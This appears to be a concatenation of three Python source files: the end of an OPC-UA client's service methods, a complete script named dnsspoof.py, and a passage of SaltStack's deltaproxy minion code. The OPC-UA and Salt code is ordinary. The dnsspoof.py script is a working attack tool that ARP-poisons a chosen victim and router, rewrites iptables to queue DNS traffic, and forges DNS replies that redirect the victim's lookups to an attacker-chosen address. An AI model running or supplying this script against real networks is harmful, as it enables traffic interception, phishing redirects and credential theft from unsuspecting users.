return response.Results
def browse_next(self, parameters):
self.logger.info("browse next")
request = ua.BrowseNextRequest()
request.Parameters = parameters
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.BrowseNextResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Parameters.Results
def read(self, parameters):
self.logger.info("read")
request = ua.ReadRequest()
request.Parameters = parameters
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.ReadResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
# cast to Enum attributes that need to
for idx, rv in enumerate(parameters.NodesToRead):
if rv.AttributeId == ua.AttributeIds.NodeClass:
dv = response.Results[idx]
if dv.StatusCode.is_good():
dv.Value.Value = ua.NodeClass(dv.Value.Value)
elif rv.AttributeId == ua.AttributeIds.ValueRank:
dv = response.Results[idx]
if dv.StatusCode.is_good() and dv.Value.Value in (-3, -2, -1, 0, 1, 2, 3, 4):
dv.Value.Value = ua.ValueRank(dv.Value.Value)
return response.Results
def write(self, params):
self.logger.info("read")
request = ua.WriteRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.WriteResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def get_endpoints(self, params):
self.logger.info("get_endpoint")
request = ua.GetEndpointsRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.GetEndpointsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Endpoints
def find_servers(self, params):
self.logger.info("find_servers")
request = ua.FindServersRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.FindServersResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Servers
def find_servers_on_network(self, params):
self.logger.info("find_servers_on_network")
request = ua.FindServersOnNetworkRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.FindServersOnNetworkResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Parameters
def register_server(self, registered_server):
self.logger.info("register_server")
request = ua.RegisterServerRequest()
request.Server = registered_server
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.RegisterServerResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
# nothing to return for this service
def register_server2(self, params):
self.logger.info("register_server2")
request = ua.RegisterServer2Request()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.RegisterServer2Response, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.ConfigurationResults
def translate_browsepaths_to_nodeids(self, browsepaths):
self.logger.info("translate_browsepath_to_nodeid")
request = ua.TranslateBrowsePathsToNodeIdsRequest()
request.Parameters.BrowsePaths = browsepaths
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.TranslateBrowsePathsToNodeIdsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def create_subscription(self, params, callback):
self.logger.info("create_subscription")
request = ua.CreateSubscriptionRequest()
request.Parameters = params
resp_fut = Future()
mycallbak = partial(self._create_subscription_callback, callback, resp_fut)
self._uasocket.send_request(request, mycallbak)
return resp_fut.result(self._timeout)
def _create_subscription_callback(self, pub_callback, resp_fut, data_fut):
self.logger.info("_create_subscription_callback")
data = data_fut.result()
response = struct_from_binary(ua.CreateSubscriptionResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
self._publishcallbacks[response.Parameters.SubscriptionId] = pub_callback
resp_fut.set_result(response.Parameters)
def delete_subscriptions(self, subscriptionids):
self.logger.info("delete_subscription")
request = ua.DeleteSubscriptionsRequest()
request.Parameters.SubscriptionIds = subscriptionids
resp_fut = Future()
mycallbak = partial(self._delete_subscriptions_callback, subscriptionids, resp_fut)
self._uasocket.send_request(request, mycallbak)
return resp_fut.result(self._timeout)
def _delete_subscriptions_callback(self, subscriptionids, resp_fut, data_fut):
self.logger.info("_delete_subscriptions_callback")
data = data_fut.result()
response = struct_from_binary(ua.DeleteSubscriptionsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
for sid in subscriptionids:
self._publishcallbacks.pop(sid)
resp_fut.set_result(response.Results)
def publish(self, acks=None):
self.logger.info("publish")
if acks is None:
acks = []
request = ua.PublishRequest()
request.Parameters.SubscriptionAcknowledgements = acks
self._uasocket.send_request(request, self._call_publish_callback, timeout=0)
def _call_publish_callback(self, future):
self.logger.info("call_publish_callback")
data = future.result()
# check if answer looks ok
try:
self._uasocket.check_answer(data, "while waiting for publish response")
except BadTimeout: # Spec Part 4, 7.28
self.publish()
return
except BadNoSubscription: # Spec Part 5, 13.8.1
# BadNoSubscription is expected after deleting the last subscription.
#
# We should therefore also check for len(self._publishcallbacks) == 0, but
# this gets us into trouble if a Publish response arrives before the
# DeleteSubscription response.
#
# We could remove the callback already when sending the DeleteSubscription request,
# but there are some legitimate reasons to keep them around, such as when the server
# responds with "BadTimeout" and we should try again later instead of just removing
# the subscription client-side.
#
# There are a variety of ways to act correctly, but the most practical solution seems
# to be to just ignore any BadNoSubscription responses.
self.logger.info("BadNoSubscription received, ignoring because it's probably valid.")
return
# parse publish response
try:
response = struct_from_binary(ua.PublishResponse, data)
self.logger.debug(response)
except Exception:
# INFO: catching the exception here might be obsolete because we already
# catch BadTimeout above. However, it's not really clear what this code
# does so it stays in, doesn't seem to hurt.
self.logger.exception("Error parsing notificatipn from server")
self.publish([]) # send publish request ot server so he does stop sending notifications
return
# look for callback
try:
callback = self._publishcallbacks[response.Parameters.SubscriptionId]
except KeyError:
self.logger.warning("Received data for unknown subscription: %s ", response.Parameters.SubscriptionId)
return
# do callback
try:
callback(response.Parameters)
except Exception: # we call client code, catch everything!
self.logger.exception("Exception while calling user callback: %s")
def create_monitored_items(self, params):
self.logger.info("create_monitored_items")
request = ua.CreateMonitoredItemsRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.CreateMonitoredItemsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def delete_monitored_items(self, params):
self.logger.info("delete_monitored_items")
request = ua.DeleteMonitoredItemsRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.DeleteMonitoredItemsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def add_nodes(self, nodestoadd):
self.logger.info("add_nodes")
request = ua.AddNodesRequest()
request.Parameters.NodesToAdd = nodestoadd
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.AddNodesResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def add_references(self, refs):
self.logger.info("add_references")
request = ua.AddReferencesRequest()
request.Parameters.ReferencesToAdd = refs
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.AddReferencesResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def delete_references(self, refs):
self.logger.info("delete")
request = ua.DeleteReferencesRequest()
request.Parameters.ReferencesToDelete = refs
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.DeleteReferencesResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Parameters.Results
def delete_nodes(self, params):
self.logger.info("delete_nodes")
request = ua.DeleteNodesRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.DeleteNodesResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def call(self, methodstocall):
request = ua.CallRequest()
request.Parameters.MethodsToCall = methodstocall
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.CallResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def history_read(self, params):
self.logger.info("history_read")
request = ua.HistoryReadRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.HistoryReadResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
def modify_monitored_items(self, params):
self.logger.info("modify_monitored_items")
request = ua.ModifyMonitoredItemsRequest()
request.Parameters = params
data = self._uasocket.send_request(request)
response = struct_from_binary(ua.ModifyMonitoredItemsResponse, data)
self.logger.debug(response)
response.ResponseHeader.ServiceResult.check()
return response.Results
|
dnsspoof.py | from twisted.internet import reactor
from twisted.internet.interfaces import IReadDescriptor
import os
import nfqueue
from scapy.all import *
import argparse
import threading
import signal
def arg_parser():
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--domain", help="Choose the domain to spoof. Example: -d facebook.com")
parser.add_argument("-r", "--routerIP", help="Choose the router IP. Example: -r 192.168.0.1")
parser.add_argument("-v", "--victimIP", help="Choose the victim IP. Example: -v 192.168.0.5")
parser.add_argument("-t", "--redirectto", help="Optional argument to choose the IP to which the victim will be redirected \
otherwise defaults to attacker's local IP. Requires either the -d or -a argument. Example: -t 80.87.128.67")
parser.add_argument("-a", "--spoofall", help="Spoof all DNS requests back to the attacker or use -r to specify an IP to redirect them to", action="store_true")
return parser.parse_args()
def originalMAC(ip):
ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=5, retry=3)
for s,r in ans:
return r[Ether].src
def poison(routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC))
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))
def restore(routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
sys.exit(0)
def cb(payload):
data = payload.get_data()
pkt = IP(data)
localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != '0.0.0.0'][0]
if not pkt.haslayer(DNSQR):
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
if arg_parser().spoofall:
if not arg_parser().redirectto:
spoofed_pkt(payload, pkt, localIP)
else:
spoofed_pkt(payload, pkt, arg_parser().redirectto)
if arg_parser().domain:
if arg_parser().domain in pkt[DNS].qd.qname:
if not arg_parser().redirectto:
spoofed_pkt(payload, pkt, localIP)
else:
spoofed_pkt(payload, pkt, arg_parser().redirectto)
def spoofed_pkt(payload, pkt, rIP):
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=rIP))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
print '[+] Sent spoofed packet for %s' % pkt[DNSQR].qname[:-1]
class Queued(object):
def __init__(self):
self.q = nfqueue.queue()
self.q.set_callback(cb)
self.q.fast_open(0, socket.AF_INET)
self.q.set_queue_maxlen(5000)
reactor.addReader(self)
self.q.set_mode(nfqueue.NFQNL_COPY_PACKET)
print '[*] Waiting for data'
def fileno(self):
return self.q.get_fd()
def doRead(self):
self.q.process_pending(100)
def connectionLost(self, reason):
reactor.removeReader(self)
def logPrefix(self):
return 'queue'
def main(args):
global victimMAC, routerMAC
if os.geteuid() != 0:
sys.exit("[!] Please run as root")
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
ipf = open('/proc/sys/net/ipv4/ip_forward', 'r+')
ipf_read = ipf.read()
if ipf_read != '1\n':
ipf.write('1\n')
ipf.close()
routerMAC = originalMAC(args.routerIP)
victimMAC = originalMAC(args.victimIP)
if routerMAC == None:
sys.exit("Could not find router MAC address. Closing....")
if victimMAC == None:
sys.exit("Could not find victim MAC address. Closing....")
print '[*] Router MAC:',routerMAC
print '[*] Victim MAC:',victimMAC
Queued()
rctr = threading.Thread(target=reactor.run, args=(False,))
rctr.daemon = True
rctr.start()
def signal_handler(signal, frame):
print 'learing iptables, sending healing packets, and turning off IP forwarding...'
with open('/proc/sys/net/ipv4/ip_forward', 'w') as forward:
forward.write(ipf_read)
restore(args.routerIP, args.victimIP, routerMAC, victimMAC)
restore(args.routerIP, args.victimIP, routerMAC, victimMAC)
os.system('/sbin/iptables -F')
os.system('/sbin/iptables -X')
os.system('/sbin/iptables -t nat -F')
os.system('/sbin/iptables -t nat -X')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
while 1:
poison(args.routerIP, args.victimIP, routerMAC, victimMAC)
time.sleep(1.5)
main(arg_parser())
|
deltaproxy.py | #
# Proxy minion metaproxy modules
#
import copy
import logging
import os
import sys
import threading
import traceback
import types
import salt
import salt.beacons
import salt.cli.daemons
import salt.client
import salt.config
import salt.crypt
import salt.defaults.exitcodes
import salt.engines
import salt.loader
import salt.log.setup
import salt.minion
import salt.payload
import salt.pillar
import salt.serializers.msgpack
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import tornado.gen
import tornado.ioloop
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltSystemExit,
)
from salt.minion import ProxyMinion
from salt.utils.event import tagify
from salt.utils.process import SignalHandlingProcess
log = logging.getLogger(__name__)
def post_master_init(self, master):
if self.connected:
self.opts["pillar"] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts["grains"],
self.opts["id"],
saltenv=self.opts["saltenv"],
pillarenv=self.opts.get("pillarenv"),
).compile_pillar()
# Ensure that the value of master is the one we passed in.
# if pillar_opts is enabled then master could be overwritten
# when compile_pillar is run.
self.opts["master"] = master
tag = "salt/deltaproxy/start"
self._fire_master(tag=tag)
if "proxy" not in self.opts["pillar"] and "proxy" not in self.opts:
errmsg = (
"No proxy key found in pillar or opts for id {}. Check your pillar/opts "
"configuration and contents. Salt-proxy aborted.".format(self.opts["id"])
)
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if "proxy" not in self.opts:
self.opts["proxy"] = self.opts["pillar"]["proxy"]
self.opts = salt.utils.dictupdate.merge(
self.opts,
self.opts["pillar"],
strategy=self.opts.get("proxy_merge_pillar_in_opts_strategy"),
merge_lists=self.opts.get("proxy_deep_merge_pillar_in_opts", False),
)
if self.opts.get("proxy_mines_pillar"):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if "mine_interval" in self.opts["pillar"]:
self.opts["mine_interval"] = self.opts["pillar"]["mine_interval"]
if "mine_functions" in self.opts["pillar"]:
general_proxy_mines = self.opts.get("mine_functions", [])
specific_proxy_mines = self.opts["pillar"]["mine_functions"]
try:
self.opts["mine_functions"] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
log.error(
"Unable to merge mine functions from the pillar in the opts, for proxy %s",
self.opts["id"],
)
fq_proxyname = self.opts["proxy"]["proxytype"]
# Need to load the modules so they get all the dunder variables
(
self.functions,
self.returners,
self.function_errors,
self.executors,
) = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions["saltutil.sync_all"](saltenv=self.opts["saltenv"])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
(
self.functions,
self.returners,
self.function_errors,
self.executors,
) = self._load_modules()
self.functions.pack["__proxy__"] = self.proxy
self.proxy.pack["__salt__"] = self.functions
self.proxy.pack["__ret__"] = self.returners
self.proxy.pack["__pillar__"] = self.opts["pillar"]
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack["__utils__"] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(
salt.engines.start_engines, self.opts, self.process_manager, proxy=self.proxy
)
proxy_init_func_name = "{}.init".format(fq_proxyname)
proxy_shutdown_func_name = "{}.shutdown".format(fq_proxyname)
if (
proxy_init_func_name not in self.proxy
or proxy_shutdown_func_name not in self.proxy
):
errmsg = (
"Proxymodule {} is missing an init() or a shutdown() or both. "
"Check your proxymodule. Salt-proxy aborted.".format(fq_proxyname)
)
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
self.module_executors = self.proxy.get(
"{}.module_executors".format(fq_proxyname), lambda: []
)()
proxy_init_fn = self.proxy[proxy_init_func_name]
proxy_init_fn(self.opts)
self.opts["grains"] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get("user", None))
self.proc_dir = salt.minion.get_proc_dir(self.opts["cachedir"], uid=uid)
if self.connected and self.opts["pillar"]:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
(
self.functions,
self.returners,
self.function_errors,
self.executors,
) = self._load_modules()
if hasattr(self, "schedule"):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, "schedule"):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[salt.minion.master_event(type="alive")],
proxy=self.proxy,
_subprocess_list=self.subprocess_list,
)
# add default scheduling jobs to the minions scheduler
if self.opts["mine_enabled"] and "mine.update" in self.functions:
self.schedule.add_job(
{
"__mine_interval": {
"function": "mine.update",
"minutes": self.opts["mine_interval"],
"jid_include": True,
"maxrunning": 2,
"run_on_start": True,
"return_job": self.opts.get("mine_return_job", False),
}
},
persist=True,
)
log.info("Added mine.update to scheduler")
else:
self.schedule.delete_job("__mine_interval", persist=True)
# add master_alive job if enabled
if self.opts["transport"] != "tcp" and self.opts["master_alive_interval"] > 0:
self.schedule.add_job(
{
salt.minion.master_event(type="alive", master=self.opts["master"]): {
"function": "status.master",
"seconds": self.opts["master_alive_interval"],
"jid_include": True,
"maxrunning": 1,
"return_job": False,
"kwargs": {"master": self.opts["master"], "connected": True},
}
},
persist=True,
)
if (
self.opts["master_failback"]
and "master_list" in self.opts
and self.opts["master"] != self.opts["master_list"][0]
):
self.schedule.add_job(
{
salt.minion.master_event(type="failback"): {
"function": "status.ping_master",
"seconds": self.opts["master_failback_interval"],
"jid_include": True,
"maxrunning": 1,
"return_job": False,
"kwargs": {"master": self.opts["master_list"][0]},
}
},
persist=True,
)
else:
self.schedule.delete_job(
salt.minion.master_event(type="failback"), persist=True
)
else:
self.schedule.delete_job(
salt.minion.master_event(type="alive", master=self.opts["master"]),
persist=True,
)
self.schedule.delete_job(
salt.minion.master_event(type="failback"), persist=True
)
# proxy keepalive
proxy_alive_fn = fq_proxyname + ".alive"
if (
proxy_alive_fn in self.proxy
and "status.proxy_reconnect" in self.functions
and self.opts.get("proxy_keep_alive", True)
):
# if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
self.schedule.add_job(
{
"__proxy_keepalive": {
"function": "status.proxy_reconnect",
"minutes": self.opts.get(
"proxy_keep_alive_interval", 1
), # by default, check once per minute
"jid_include": True,
"maxrunning": 1,
"return_job": False,
"kwargs": {"proxy_name": fq_proxyname},
}
},
persist=True,
)
self.schedule.enable_schedule()
else:
self.schedule.delete_job("__proxy_keepalive", persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions["saltutil.sync_grains"](saltenv="base")
self.grains_cache = self.opts["grains"]
# Now setup the deltaproxies
self.deltaproxy = {}
self.deltaproxy_opts = {}
self.deltaproxy_objs = {}
self.proxy_grains = {}
self.proxy_pillar = {}
self.proxy_context = {}
self.add_periodic_callback("cleanup", self.cleanup_subprocesses)
for _id in self.opts["proxy"].get("ids", []):
control_id = self.opts["id"]
proxyopts = self.opts.copy()
proxyopts["id"] = _id
proxyopts = salt.config.proxy_config(
self.opts["conf_file"], defaults=proxyopts, minion_id=_id
)
proxyopts["id"] = proxyopts["proxyid"] = _id
proxyopts["subproxy"] = True
self.proxy_context[_id] = {"proxy_id": _id}
# We need grains first to be able to load pillar, which is where we keep the proxy
# configurations
self.proxy_grains[_id] = salt.loader.grains(
proxyopts, proxy=self.proxy, context=self.proxy_context[_id]
)
self.proxy_pillar[_id] = yield salt.pillar.get_async_pillar(
proxyopts,
self.proxy_grains[_id],
_id,
saltenv=proxyopts["saltenv"],
pillarenv=proxyopts.get("pillarenv"),
).compile_pillar()
proxyopts["proxy"] = self.proxy_pillar[_id].get("proxy", {})
# Remove ids
proxyopts["proxy"].pop("ids", None)
proxyopts["pillar"] = self.proxy_pillar[_id]
proxyopts["grains"] = self.proxy_grains[_id]
proxyopts["hash_id"] = self.opts["id"]
_proxy_minion = ProxyMinion(proxyopts)
_proxy_minion.proc_dir = salt.minion.get_proc_dir(
proxyopts["cachedir"], uid=uid
)
_proxy_minion.proxy = salt.loader.proxy(
proxyopts, utils=self.utils, context=self.proxy_context[_id]
)
_proxy_minion.subprocess_list = self.subprocess_list
# And load the modules
(
_proxy_minion.functions,
_proxy_minion.returners,
_proxy_minion.function_errors,
_proxy_minion.executors,
) = _proxy_minion._load_modules(
opts=proxyopts, grains=proxyopts["grains"], context=self.proxy_context[_id]
)
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
_proxy_minion.functions["saltutil.sync_all"](saltenv=self.opts["saltenv"])
# And re-load the modules so the __proxy__ variable gets injected
(
_proxy_minion.functions,
_proxy_minion.returners,
_proxy_minion.function_errors,
_proxy_minion.executors,
) = _proxy_minion._load_modules(
opts=proxyopts, grains=proxyopts["grains"], context=self.proxy_context[_id]
)
_proxy_minion.functions.pack["__proxy__"] = _proxy_minion.proxy
_proxy_minion.proxy.pack["__salt__"] = _proxy_minion.functions
_proxy_minion.proxy.pack["__ret__"] = _proxy_minion.returners
_proxy_minion.proxy.pack["__pillar__"] = proxyopts["pillar"]
_proxy_minion.proxy.pack["__grains__"] = proxyopts["grains"]
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
_proxy_minion.proxy.utils = salt.loader.utils(
proxyopts, proxy=_proxy_minion.proxy, context=self.proxy_context[_id]
)
_proxy_minion.proxy.pack["__utils__"] = _proxy_minion.proxy.utils
# Reload all modules so all dunder variables are injected
_proxy_minion.proxy.reload_modules()
_proxy_minion.connected = True
_fq_proxyname = proxyopts["proxy"]["proxytype"]
proxy_init_fn = _proxy_minion.proxy[_fq_proxyname + ".init"]
proxy_init_fn(proxyopts)
# Reload the grains
self.proxy_grains[_id] = salt.loader.grains(
proxyopts, proxy=_proxy_minion.proxy, context=self.proxy_context[_id]
)
proxyopts["grains"] = self.proxy_grains[_id]
if not hasattr(_proxy_minion, "schedule"):
_proxy_minion.schedule = salt.utils.schedule.Schedule(
proxyopts,
_proxy_minion.functions,
_proxy_minion.returners,
cleanup=[salt.minion.master_event(type="alive")],
proxy=_proxy_minion.proxy,
new_instance=True,
_subprocess_list=_proxy_minion.subprocess_list,
)
self.deltaproxy_objs[_id] = _proxy_minion
self.deltaproxy_opts[_id] = copy.deepcopy(proxyopts)
# proxy keepalive
_proxy_alive_fn = _fq_proxyname + ".alive"
if (
_proxy_alive_fn in _proxy_minion.proxy
and "status.proxy_reconnect" in self.deltaproxy_objs[_id].functions
and proxyopts.get("proxy_keep_alive", True)
):
# if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
_proxy_minion.schedule.add_job(
{
"__proxy_keepalive": {
"function": "status.proxy_reconnect",
"minutes": proxyopts.get(
"proxy_keep_alive_interval", 1
), # by default, check once per minute
"jid_include": True,
"maxrunning": 1,
"return_job": False,
"kwargs": {"proxy_name": _fq_proxyname},
}
},
persist=True,
)
_proxy_minion.schedule.enable_schedule()
else:
_proxy_minion.schedule.delete_job("__proxy_keepalive", persist=True)
self.ready = True
def target(cls, minion_instance, opts, data, connected):
log.debug(
"Deltaproxy minion_instance %s(ID: %s). Target: %s",
minion_instance,
minion_instance.opts["id"],
opts["id"],
)
if not hasattr(minion_instance, "serial"):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, "proc_dir"):
uid = salt.utils.user.get_uid(user=opts.get("user", None))
minion_instance.proc_dir = salt.minion.get_proc_dir(opts["cachedir"], uid=uid)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data["fun"], tuple) or isinstance(data["fun"], list):
ProxyMinion._thread_multi_return(minion_instance, opts, data)
else:
ProxyMinion._thread_return(minion_instance, opts, data)
def thread_return(cls, minion_instance, opts, data):
"""
This method should be used as a threading target, start the actual
minion side execution.
"""
fn_ = os.path.join(minion_instance.proc_dir, data["jid"])
if opts["multiprocessing"] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle(
"{}._thread_return {}".format(cls.__name__, data["jid"])
)
sdata = {"pid": os.getpid()}
sdata.update(data)
log.info("Starting a new job with PID %s", sdata["pid"])
with salt.utils.files.fopen(fn_, "w+b") as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {"success": False}
function_name = data["fun"]
executors = (
data.get("module_executors")
or getattr(minion_instance, "module_executors", [])
or opts.get("module_executors", ["direct_call"])
)
allow_missing_funcs = any(
[
minion_instance.executors["{}.allow_missing_func".format(executor)](
function_name
)
for executor in executors
if "{}.allow_missing_func".format(executor) in minion_instance.executors
]
)
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts["pillar"].get(
"minion_blackout", False
):
whitelist = minion_instance.opts["pillar"].get(
"minion_blackout_whitelist", []
)
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if (
function_name != "saltutil.refresh_pillar"
and function_name not in whitelist
):
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts["grains"].get("minion_blackout", False):
whitelist = minion_instance.opts["grains"].get(
"minion_blackout_whitelist", []
)
if (
function_name != "saltutil.refresh_pillar"
and function_name not in whitelist
):
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError(
'Minion in blackout mode. Set "minion_blackout" '
"to False in pillar or grains to resume operations. Only "
"saltutil.refresh_pillar allowed in blackout mode."
)
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = salt.minion.load_args_and_kwargs(func, data["arg"], data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data["arg"], data
minion_instance.functions.pack["__context__"]["retcode"] = 0
minion_instance.functions.pack["__opts__"] = opts
if isinstance(executors, str):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError(
"Wrong executors specification: {}. String or non-empty list expected".format(
executors
)
)
if opts.get("sudo_user", "") and executors[-1] != "sudo":
executors[-1] = "sudo" # replace the last one with sudo
log.debug("Executors list %s", executors)
for name in executors:
fname = "{}.execute".format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError(
"Executor '{}' is not available".format(name)
)
return_data = minion_instance.executors[fname](
opts, data, func, args, kwargs
)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data["jid"], "prog", opts["id"], str(ind)], "job")
event_data = {"return": single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret["return"] = iret
else:
ret["return"] = return_data
retcode = minion_instance.functions.pack["__context__"].get(
"retcode", salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(
return_data.get(x, True) for x in ("result", "success")
)
except Exception: # pylint: disable=broad-except
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret["retcode"] = retcode
ret["success"] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for "{}" not found'.format(function_name)
log.debug(msg, exc_info=True)
ret["return"] = "{}: {}".format(msg, exc)
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in "%s" had a problem: %s',
function_name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
ret["return"] = "ERROR: {}".format(exc)
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing "%s": %s',
function_name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
ret["return"] = 'ERROR executing "{}": {}'.format(function_name, exc)
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = "Passed invalid arguments to {}: {}\n{}".format(
function_name, exc, func.__doc__ or ""
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret["return"] = msg
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
